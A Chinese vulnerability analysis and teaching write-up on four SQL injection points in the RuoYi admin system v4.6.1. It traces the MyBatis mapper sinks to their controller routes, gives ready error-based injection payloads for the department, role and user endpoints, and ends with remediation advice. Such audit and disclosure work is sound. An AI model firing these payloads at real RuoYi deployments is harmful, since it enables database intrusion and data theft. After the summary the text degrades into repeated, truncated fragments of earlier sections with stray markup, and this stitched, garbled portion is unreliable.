若依系统v4.6.1 SQL注入漏洞分析与教学文档<\/h1>

1. 序言<\/h2>
根据若依系统官网的更新日志，v4.6.1版本并未修复v4.6.0版本中存在的SQL注入漏洞。本文档将详细分析若依系统v4.6.1版本中存在的SQL注入漏洞，包括漏洞原理、审计过程、验证方法以及修复建议。<\/p>

2. 审计方法与工具<\/h2>

2.1 审计方法<\/h3>

全局搜索$<\/code>符号并匹配.xml<\/code>文件类型，快速定位潜在的SQL注入点<\/li>
使用IDE（如IDEA）的代码追踪功能（Ctrl+左键）跟踪参数传递路径<\/li>

结合Burp Suite进行漏洞验证<\/li>
<\/ul>
2.2 所需工具<\/h3>

IntelliJ IDEA（用于代码审计）<\/li>
Burp Suite（用于漏洞验证）<\/li>
若依系统v4.6.1源码<\/li>
<\/ul>
3. SQL注入漏洞分析<\/h2>
3.1 注入点1：SysDeptMapper.xml中的params.dataScope参数<\/h3>
漏洞位置<\/h4>
resources\/mapper\/system\/SysDeptMapper.xml<\/code>文件<\/p>
漏洞代码<\/h4>
<if<\/span> test=<\/span>"params.dataScope != null and params.dataScope != ''"<\/span>><\/span>
<\/span><\/span>    AND ${params.dataScope}
<\/span><\/span><\/if><\/span>
<\/span><\/span><\/code><\/pre>审计路径<\/h4>

在SysDeptMapper.xml中找到selectDeptList<\/code>方法<\/li>
追踪到dao\/mapper层<\/li>
继续追踪到service层<\/li>
最终定位到controller层：\/system\/dept\/list<\/code> (POST请求)<\/li>
<\/ol>
验证方法<\/h4>

访问部门管理功能<\/li>
抓取请求并修改POST请求体：<\/li>
<\/ol>
deptName=&status=&params[dataScope]=and extractvalue(1,concat(0x7e,substring((select database()),1,32),0x7e))
<\/code><\/pre>
关键发现<\/h4>

正确的注入参数是params[dataScope]<\/code>而非params.dataScope<\/code><\/li>
参数传递过程：controller → service → mapper → XML<\/li>
<\/ul>
影响范围<\/h4>
所有调用selectDeptList(dept)<\/code>方法的功能点<\/p>
3.2 注入点2：SysDeptMapper.xml中的ancestors参数<\/h3>
漏洞位置<\/h4>
resources\/mapper\/system\/SysDeptMapper.xml<\/code>文件<\/p>
漏洞代码<\/h4>
update sys_dept 
<\/span><\/span>set ancestors = #{ancestors} 
<\/span><\/span>where dept_id in (${ancestors})
<\/span><\/span><\/code><\/pre>审计路径<\/h4>

在SysDeptMapper.xml中找到相关SQL<\/li>
追踪到SysDeptController.java<\/code><\/li>
对应路由：部门编辑功能<\/li>
<\/ol>
验证方法<\/h4>

编辑市场部门<\/li>
抓包并构造payload：<\/li>
<\/ol>
ancestors=0) and extractvalue(1,concat(0x7e,substring((select user()),1,32),0x7e)) --
<\/code><\/pre>
关键发现<\/h4>

dept_id必须在ancestors范围内才能触发漏洞<\/li>
更新操作前会先进行多次查询<\/li>
<\/ul>
3.3 注入点3：SysRoleMapper.xml中的params.dataScope参数<\/h3>
漏洞位置<\/h4>
resources\/mapper\/system\/SysRoleMapper.xml<\/code>文件<\/p>
漏洞代码<\/h4>
<if<\/span> test=<\/span>"params.dataScope != null and params.dataScope != ''"<\/span>><\/span>
<\/span><\/span>    AND ${params.dataScope}
<\/span><\/span><\/if><\/span>
<\/span><\/span><\/code><\/pre>审计路径<\/h4>

全局搜索selectRoleList<\/code>方法<\/li>
追踪到dao → service → controller<\/li>
对应两个功能点：

\/system\/role\/list<\/code> (GET请求)<\/li>
\/system\/role\/export<\/code> (POST请求)<\/li>
<\/ul>
<\/li>
<\/ol>
验证方法<\/h4>
构造payload：<\/p>
pageSize=10&pageNum=1&orderByColumn=roleSort&isAsc=asc&roleName=&roleKey=&status=¶ms%5BbeginTime%5D=¶ms%5BendTime%5D=¶ms[dataScope]=and extractvalue(1,concat(0x7e,substring((select user()),1,32),0x7e))
<\/code><\/pre>
3.4 注入点4：SysUserMapper.xml中的params.dataScope参数<\/h3>
漏洞位置<\/h4>
resources\/mapper\/system\/SysUserMapper.xml<\/code>文件<\/p>
漏洞代码<\/h4>
<if<\/span> test=<\/span>"params.dataScope != null and params.dataScope != ''"<\/span>><\/span>
<\/span><\/span>    AND ${params.dataScope}
<\/span><\/span><\/if><\/span>
<\/span><\/span><\/code><\/pre>审计路径<\/h4>

全局搜索selectUserList<\/code>方法<\/li>
追踪到dao → service → controller<\/li>
对应路由：用户管理功能<\/li>
<\/ol>
验证方法<\/h4>
构造payload：<\/p>
pageSize=10&pageNum=1&orderByColumn=createTime&isAsc=desc&deptId=&parentId=&loginName=&phonenumber=&status=¶ms%5BbeginTime%5D=¶ms%5BendTime%5D=¶ms[dataScope]=and extractvalue(1,concat(0x7e,substring((select user()),1,32),0x7e))
<\/code><\/pre>
4. 漏洞原理分析<\/h2>
4.1 根本原因<\/h3>
所有漏洞均源于MyBatis中使用了${}<\/code>而非#{}<\/code>进行参数拼接：<\/p>

#{}<\/code>：预编译参数，安全<\/li>
${}<\/code>：直接拼接SQL语句，存在SQL注入风险<\/li>
<\/ul>
4.2 参数传递机制<\/h3>
${params.dataScope}<\/code>表示入参参数的dataScope属性，即SysDept<\/code>对象的dataScope<\/code>属性。正确的注入参数格式应为params[dataScope]<\/code>而非params.dataScope<\/code>。<\/p>
5. 修复建议<\/h2>
5.1 临时修复方案<\/h3>

对所有使用${}<\/code>的SQL语句进行参数化查询改造<\/li>
添加输入过滤和验证<\/li>
<\/ol>
5.2 长期修复方案<\/h3>

升级到已修复漏洞的若依系统版本<\/li>
建立代码审计机制，避免类似问题再次发生<\/li>
使用MyBatis的#{}<\/code>预编译方式替代${}<\/code>拼接<\/li>
<\/ol>
6. 总结<\/h2>
若依系统v4.6.1版本中存在多处SQL注入漏洞，主要分布在：<\/p>

部门管理功能（params.dataScope<\/code>和ancestors<\/code>参数）<\/li>
角色管理功能（params.dataScope<\/code>参数）<\/li>
用户管理功能（params.dataScope<\/code>参数）<\/li>
<\/ol>
这些漏洞均源于不安全的SQL拼接方式，攻击者可利用这些漏洞获取数据库敏感信息。建议用户及时升级系统或按照修复建议进行修补。<\/p>

若依系统v4.6.1 SQL注入漏洞分析与教学文档<\/h1>

1. 序言<\/h2>
根据若依系统官网的更新日志，v4.6.1版本并未修复v4.6.0版本中存在的SQL注入漏洞。本文档将详细分析若依系统v4.6.1版本中存在的SQL注入漏洞，包括漏洞原理、审计过程、验证方法以及修复建议。<\/p>

2. 审计方法与工具<\/h2>

3. SQL注入漏洞分析<\/h2>

3.1 注入点1：SysDeptMapper.xml中的params.dataScope参数<\/h3>

漏洞位置<\/h4>
`resources\/mapper\/system\/SysDeptMapper.xml<\/code>文件<\/p>`

影响范围<\/h4>
所有调用`selectDeptList(dept)<\/code>方法的功能点<\/p>`

漏洞位置<\/h4>
`resources\/mapper\/system\/SysDeptMapper.xml<\/code>文件<\/p>`

3.3 注入点3：SysRoleMapper.xml中的params.dataScope参数<\/h3>

漏洞位置<\/h4>
`resources\/mapper\/system\/SysRoleMapper.xml<\/code>文件<\/p>`

3.4 注入点4：SysUserMapper.xml中的params.dataScope参数<\/h3>

漏洞位置<\/h4>
`resources\/mapper\/system\/SysUserMapper.xml<\/code>文件<\/p>`

4. 漏洞原理分析<\/h2>

4.2 参数传递机制<\/h3>
`${params.dataScope}<\/code>表示入参参数的dataScope属性，即SysDept<\/code>对象的dataScope<\/code>属性。正确的注入参数格式应为params[dataScope]<\/code>而非params.dataScope<\/code>。<\/p>`

若依系统v4.6.1 SQL注入漏洞分析与教学文档<\/h1>

1. 序言<\/h2> 根据若依系统官网的更新日志，v4.6.1版本并未修复v4.6.0版本中存在的SQL注入漏洞。本文档将详细分析若依系统v4.6.1版本中存在的SQL注入漏洞，包括漏洞原理、审计过程、验证方法以及修复建议。<\/p>

2. 审计方法与工具<\/h2>

3. SQL注入漏洞分析<\/h2>

3.1 注入点1：SysDeptMapper.xml中的params.dataScope参数<\/h3>

漏洞位置<\/h4> resources\/mapper\/system\/SysDeptMapper.xml<\/code>文件<\/p>

影响范围<\/h4> 所有调用selectDeptList(dept)<\/code>方法的功能点<\/p>

漏洞位置<\/h4> resources\/mapper\/system\/SysDeptMapper.xml<\/code>文件<\/p>

3.3 注入点3：SysRoleMapper.xml中的params.dataScope参数<\/h3>

漏洞位置<\/h4> resources\/mapper\/system\/SysRoleMapper.xml<\/code>文件<\/p>

3.4 注入点4：SysUserMapper.xml中的params.dataScope参数<\/h3>

漏洞位置<\/h4> resources\/mapper\/system\/SysUserMapper.xml<\/code>文件<\/p>

4. 漏洞原理分析<\/h2>

4.2 参数传递机制<\/h3> ${params.dataScope}<\/code>表示入参参数的dataScope属性，即SysDept<\/code>对象的dataScope<\/code>属性。正确的注入参数格式应为params[dataScope]<\/code>而非params.dataScope<\/code>。<\/p>

1. 序言<\/h2>
根据若依系统官网的更新日志，v4.6.1版本并未修复v4.6.0版本中存在的SQL注入漏洞。本文档将详细分析若依系统v4.6.1版本中存在的SQL注入漏洞，包括漏洞原理、审计过程、验证方法以及修复建议。<\/p>

漏洞位置<\/h4>
`resources\/mapper\/system\/SysDeptMapper.xml<\/code>文件<\/p>`

影响范围<\/h4>
所有调用`selectDeptList(dept)<\/code>方法的功能点<\/p>`

漏洞位置<\/h4>
`resources\/mapper\/system\/SysDeptMapper.xml<\/code>文件<\/p>`

漏洞位置<\/h4>
`resources\/mapper\/system\/SysRoleMapper.xml<\/code>文件<\/p>`

漏洞位置<\/h4>
`resources\/mapper\/system\/SysUserMapper.xml<\/code>文件<\/p>`

4.2 参数传递机制<\/h3>
`${params.dataScope}<\/code>表示入参参数的dataScope属性，即SysDept<\/code>对象的dataScope<\/code>属性。正确的注入参数格式应为params[dataScope]<\/code>而非params.dataScope<\/code>。<\/p>`